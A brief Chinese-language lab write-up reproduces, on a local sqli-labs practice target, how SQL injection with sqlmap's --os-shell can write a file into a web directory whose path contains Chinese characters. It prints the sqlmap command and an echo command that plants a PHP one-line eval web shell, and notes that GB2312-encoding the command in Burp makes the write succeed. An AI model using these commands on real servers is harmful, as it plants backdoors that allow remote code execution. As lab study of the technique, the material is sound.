问题
看了师傅文章MSSQL高权限注入写马至中文路径自己复现一下。
复现
环境:
win10
phpstudy
sqli-labs靶场
python sqlmap.py -u http://localhost/sqli-labs-master/Less-1/?id=1 --os-shell --proxy http://127.0.0.1:8080
正常写带中文路径的,可以看到是失败的没有生成文件。
burp抓个包。
将命令GB2312编码,然后替换到burp上。
echo ^<?php @eval($_POST[x])?^> > D:\Software\phpStudy\PHPTutorial\WWW\中文\a.php
网址 在线工具
执行成功生成文件。
参考
https://forum.butian.net/share/166